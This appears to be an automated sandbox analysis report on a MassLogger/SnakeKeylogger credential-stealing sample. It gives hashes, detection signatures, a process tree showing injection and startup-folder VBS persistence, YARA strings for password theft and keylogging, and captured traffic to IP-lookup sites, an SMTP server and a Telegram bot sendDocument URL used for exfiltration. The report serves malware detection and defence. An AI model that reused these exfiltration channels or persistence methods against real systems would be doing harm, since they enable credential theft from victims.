
Windows Analysis Report
TtLlwb3ava.exe

Overview

General Information

Sample name: TtLlwb3ava.exe (renamed because the original name is a hash value)
Original sample name: 1622c28fa57b7ff8998eac6ae42e6cb6662446c47b25ff24befb841356267c7d.exe
Analysis ID: 1634734
MD5: 1e20ce6bbf686369929e0d191f9607ad
SHA1: 7abc4e70e996ec2e05bfc1417db7daf49d12032e
SHA256: 1622c28fa57b7ff8998eac6ae42e6cb6662446c47b25ff24befb841356267c7d
Tags: exe, MassLogger, user-adrian__luca

Detection

MSIL Logger, MassLogger RAT
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AntiVM3
Yara detected MSIL Logger
Yara detected MassLogger RAT
Yara detected Telegram RAT
.NET source code contains potential unpacker
Drops VBS files to the startup folder
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • TtLlwb3ava.exe (PID: 6708 cmdline: "C:\Users\user\Desktop\TtLlwb3ava.exe" MD5: 1E20CE6BBF686369929E0D191F9607AD)
    • InstallUtil.exe (PID: 6996 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • wscript.exe (PID: 7272 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Activator.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • Activator.exe (PID: 7328 cmdline: "C:\Users\user\AppData\Roaming\Activator.exe" MD5: 1E20CE6BBF686369929E0D191F9607AD)
      • InstallUtil.exe (PID: 7368 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
No configs have been found
Source: 00000002.00000002.2469589164.00000000003E3000.00000040.00000400.00020000.00000000.sdmp; Rule: JoeSecurity_MassLogger; Description: Yara detected MassLogger RAT; Author: Joe Security
Source: 00000002.00000002.2469589164.00000000003E3000.00000040.00000400.00020000.00000000.sdmp; Rule: JoeSecurity_MSILLogger; Description: Yara detected MSIL Logger; Author: Joe Security
Source: 00000002.00000002.2469589164.00000000003E3000.00000040.00000400.00020000.00000000.sdmp; Rule: Windows_Trojan_SnakeKeylogger_af3faa65; Description: unknown; Author: unknown; Strings:
  • 0xdfb7:$a1: get_encryptedPassword
  • 0xe2df:$a2: get_encryptedUsername
  • 0xdd52:$a3: get_timePasswordChanged
  • 0xde73:$a4: get_passwordField
  • 0xdfcd:$a5: set_encryptedPassword
  • 0xf929:$a7: get_logins
  • 0xf5da:$a8: GetOutlookPasswords
  • 0xf3cc:$a9: StartKeylogger
  • 0xf879:$a10: KeyLoggerEventArgs
  • 0xf429:$a11: KeyLoggerEventArgsEventHandler
Source: 00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_MassLogger; Description: Yara detected MassLogger RAT; Author: Joe Security
Source: 00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_CredentialStealer; Description: Yara detected Credential Stealer; Author: Joe Security
(45 entries in total)

Source: 0.2.TtLlwb3ava.exe.5380000.8.unpack; Rule: JoeSecurity_CosturaAssemblyLoader; Description: Yara detected Costura Assembly Loader; Author: Joe Security
Source: 0.2.TtLlwb3ava.exe.5380000.8.raw.unpack; Rule: JoeSecurity_CosturaAssemblyLoader; Description: Yara detected Costura Assembly Loader; Author: Joe Security
Source: 11.2.InstallUtil.exe.400000.0.unpack; Rule: JoeSecurity_CredentialStealer; Description: Yara detected Credential Stealer; Author: Joe Security
Source: 11.2.InstallUtil.exe.400000.0.unpack; Rule: JoeSecurity_MSILLogger; Description: Yara detected MSIL Logger; Author: Joe Security
Source: 11.2.InstallUtil.exe.400000.0.unpack; Rule: JoeSecurity_TelegramRAT; Description: Yara detected Telegram RAT; Author: Joe Security
(35 entries in total)

System Summary

Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Activator.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Activator.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 496, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Activator.vbs" , ProcessId: 7272, ProcessName: wscript.exe
Source: Network Connection; Author: frack113; Data: DestinationIp: 209.182.213.250, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Initiated: true, ProcessId: 6996, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49696
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Activator.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Activator.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 496, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Activator.vbs" , ProcessId: 7272, ProcessName: wscript.exe

Data Obfuscation

Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Users\user\Desktop\TtLlwb3ava.exe, ProcessId: 6708, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Activator.vbs

Timestamp                        SID      Severity  Classtype                Source IP    Source Port  Destination IP  Destination Port  Protocol
2025-03-11T04:11:36.972985+0100  2803274  2         Potentially Bad Traffic  192.168.2.6  49692        132.226.8.169   80                TCP
2025-03-11T04:11:46.817416+0100  2803274  2         Potentially Bad Traffic  192.168.2.6  49692        132.226.8.169   80                TCP
2025-03-11T04:11:51.708081+0100  2803274  2         Potentially Bad Traffic  192.168.2.6  49697        132.226.8.169   80                TCP
2025-03-11T04:12:02.301801+0100  2803274  2         Potentially Bad Traffic  192.168.2.6  49697        132.226.8.169   80                TCP


AV Detection

Source: TtLlwb3ava.exe; Avira: detected
Source: C:\Users\user\AppData\Roaming\Activator.exe; Avira: detection malicious, Label: TR/AD.SnakeStealer.qzqju
Source: C:\Users\user\AppData\Roaming\Activator.exe; ReversingLabs: Detection: 78%
Source: TtLlwb3ava.exe; Virustotal: Detection: 72%
Source: TtLlwb3ava.exe; ReversingLabs: Detection: 78%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Source: unknown; DNS query: name: reallyfreegeoip.org
Source: TtLlwb3ava.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown; HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:49694 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:49699 version: TLS 1.0
Source: TtLlwb3ava.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e; source: TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003A3F000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1247789807.0000000005630000.00000004.08000000.00040000.00000000.sdmp, Activator.exe, 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb; source: TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003A3F000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1247789807.0000000005630000.00000004.08000000.00040000.00000000.sdmp, Activator.exe, 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq; source: TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1246874921.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039D5000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb; source: TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1246874921.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039D5000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\TtLlwb3ava.exe; Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h; 0_2_0103081F
Source: C:\Users\user\Desktop\TtLlwb3ava.exe; Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h; 0_2_0103082C
Source: C:\Users\user\Desktop\TtLlwb3ava.exe; Code function: 4x nop then jmp 0557C3B0h; 0_2_0557C1D8
Source: C:\Users\user\Desktop\TtLlwb3ava.exe; Code function: 4x nop then jmp 0557C3B0h; 0_2_0557C1C9
Source: C:\Users\user\Desktop\TtLlwb3ava.exe; Code function: 4x nop then jmp 055B35BEh; 0_2_055B3210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 4x nop then jmp 04A89741h; 2_2_04A89490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 4x nop then jmp 04A89E6Ah; 2_2_04A89A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 4x nop then jmp 04A89E6Ah; 2_2_04A89D97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 4x nop then jmp 04A89E6Ah; 2_2_04A89A4B
Source: C:\Users\user\AppData\Roaming\Activator.exe; Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h; 10_2_018C081F
Source: C:\Users\user\AppData\Roaming\Activator.exe; Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h; 10_2_018C082C
Source: C:\Users\user\AppData\Roaming\Activator.exe; Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h; 10_2_018C07C7
Source: C:\Users\user\AppData\Roaming\Activator.exe; Code function: 4x nop then jmp 05F5C3B0h; 10_2_05F5C1D8
Source: C:\Users\user\AppData\Roaming\Activator.exe; Code function: 4x nop then jmp 05F5C3B0h; 10_2_05F5C1C9
Source: C:\Users\user\AppData\Roaming\Activator.exe; Code function: 4x nop then jmp 060D2088h; 10_2_060D1FC9
Source: C:\Users\user\AppData\Roaming\Activator.exe; Code function: 4x nop then jmp 060D2088h; 10_2_060D1FD0
Source: C:\Users\user\AppData\Roaming\Activator.exe; Code function: 4x nop then jmp 060F35BEh; 10_2_060F3521
Source: C:\Users\user\AppData\Roaming\Activator.exe; Code function: 4x nop then jmp 060F35BEh; 10_2_060F3201
Source: C:\Users\user\AppData\Roaming\Activator.exe; Code function: 4x nop then jmp 060F35BEh; 10_2_060F3210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 4x nop then jmp 03029731h; 11_2_03029480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 4x nop then jmp 03029E5Ah; 11_2_03029A40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 4x nop then jmp 03029E5Ah; 11_2_03029A30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 4x nop then jmp 03029E5Ah; 11_2_03029D87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 4x nop then jmp 05C08830h; 11_2_05C08588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 4x nop then jmp 05C047C9h; 11_2_05C04520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 4x nop then jmp 05C0F700h; 11_2_05C0F458
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 4x nop then jmp 05C076D0h; 11_2_05C07428
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 4x nop then jmp 05C0E9F8h; 11_2_05C0E750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 4x nop then jmp 05C05929h; 11_2_05C05680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 4x nop then jmp 05C0E5A0h; 11_2_05C0E180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 4x nop then jmp 05C083D8h; 11_2_05C08130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 4x nop then jmp 05C0F2A8h; 11_2_05C0F000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 4x nop then jmp 05C07278h; 11_2_05C07250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 4x nop then jmp 05C054D1h; 11_2_05C05228
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 4x nop then jmp 05C05079h; 11_2_05C04DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 4x nop then jmp 05C07F80h; 11_2_05C07CD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 4x nop then jmp 05C04C21h; 11_2_05C04978
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 4x nop then jmp 05C07B28h; 11_2_05C07880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 4x nop then jmp 05C0FB58h; 11_2_05C0F8B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 4x nop then jmp 05C0EE50h; 11_2_05C0EBA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 4x nop then jmp 05C05E15h; 11_2_05C05AD8
Source: global traffic; TCP traffic: 192.168.2.6:49696 -> 209.182.213.250:587
Source: global traffic; HTTP traffic detected:
  GET /xml/8.46.123.189 HTTP/1.1
  Host: reallyfreegeoip.org
  Connection: Keep-Alive
Source: global traffic; HTTP traffic detected:
  GET /xml/8.46.123.189 HTTP/1.1
  Host: reallyfreegeoip.org
  Connection: Keep-Alive
Source: Joe Sandbox View; IP Address: 132.226.8.169
Source: Joe Sandbox View; IP Address: 104.21.80.1
Source: Joe Sandbox View; IP Address: 104.21.80.1
Source: Joe Sandbox View; JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: unknown; DNS query: name: checkip.dyndns.org
Source: unknown; DNS query: name: reallyfreegeoip.org
Source: Network traffic; Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49692 -> 132.226.8.169:80
Source: Network traffic; Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49697 -> 132.226.8.169:80
Source: global traffic; TCP traffic: 192.168.2.6:49696 -> 209.182.213.250:587
Source: global traffic; HTTP traffic detected:
  GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
  Connection: Keep-Alive
Source: global traffic; HTTP traffic detected:
  GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
Source: global traffic; HTTP traffic detected:
  GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
Source: global traffic; HTTP traffic detected:
  GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
  Connection: Keep-Alive
Source: global traffic; HTTP traffic detected:
  GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
Source: global traffic; HTTP traffic detected:
  GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
Source: unknown; HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:49694 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:49699 version: TLS 1.0
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; HTTP traffic detected:
  GET /xml/8.46.123.189 HTTP/1.1
  Host: reallyfreegeoip.org
  Connection: Keep-Alive
Source: global traffic; HTTP traffic detected:
  GET /xml/8.46.123.189 HTTP/1.1
  Host: reallyfreegeoip.org
  Connection: Keep-Alive
Source: global traffic; HTTP traffic detected:
  GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
  Connection: Keep-Alive
Source: global traffic; HTTP traffic detected:
  GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
Source: global traffic; HTTP traffic detected:
  GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
Source: global traffic; HTTP traffic detected:
  GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
  Connection: Keep-Alive
Source: global traffic; HTTP traffic detected:
  GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
Source: global traffic; HTTP traffic detected:
  GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
Source: global traffic; DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic; DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic; DNS traffic detected: DNS query: mail.ncsp.pk
Source: InstallUtil.exe, 00000002.00000002.2472513262.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030F0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://checkip.dyndns.com
Source: InstallUtil.exe, 00000002.00000002.2472513262.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030F0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://checkip.dyndns.comd
Source: InstallUtil.exe, 00000002.00000002.2472513262.0000000002561000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2472513262.00000000026AB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2472513262.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030E4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030F0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000031C6000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://checkip.dyndns.org
Source: InstallUtil.exe, 00000002.00000002.2472513262.0000000002561000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.0000000003071000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030C3000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://checkip.dyndns.org/
Source: InstallUtil.exe, 00000002.00000002.2472513262.00000000026AB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2472513262.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030F0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000031C6000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://checkip.dyndns.org/d
Source: TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Activator.exe, 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2469459435.0000000000413000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: http://checkip.dyndns.org/q
Source: InstallUtil.exe, 00000002.00000002.2472513262.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030F0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://checkip.dyndns.orgd
Source: InstallUtil.exe, 00000002.00000002.2472513262.00000000026AB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000031C6000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://mail.ncsp.pk
Source: InstallUtil.exe, 00000002.00000002.2472513262.00000000026AB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000031C6000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://mail.ncsp.pkd
Source: InstallUtil.exe, 00000002.00000002.2472513262.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.000000000310E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://reallyfreegeoip.org
Source: InstallUtil.exe, 00000002.00000002.2472513262.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.000000000310E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://reallyfreegeoip.orgd
Source: TtLlwb3ava.exe, 00000000.00000002.1234437287.0000000002971000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2472513262.0000000002561000.00000004.00000800.00020000.00000000.sdmp, Activator.exe, 0000000A.00000002.1376773005.00000000035A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030C3000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: InstallUtil.exe, 00000002.00000002.2472513262.00000000026AB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000031C6000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://api.telegram.org/bot
Source: TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Activator.exe, 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2469459435.0000000000413000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1246874921.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039D5000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1246874921.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039D5000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1246874921.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039D5000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: InstallUtil.exe, 00000002.00000002.2472513262.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030F0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://reallyfreegeoip.org
Source: TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2472513262.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, Activator.exe, 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2469459435.0000000000413000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030F0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: InstallUtil.exe, 00000002.00000002.2472513262.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030F0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189d
Source: InstallUtil.exe, 00000002.00000002.2472513262.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030F0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
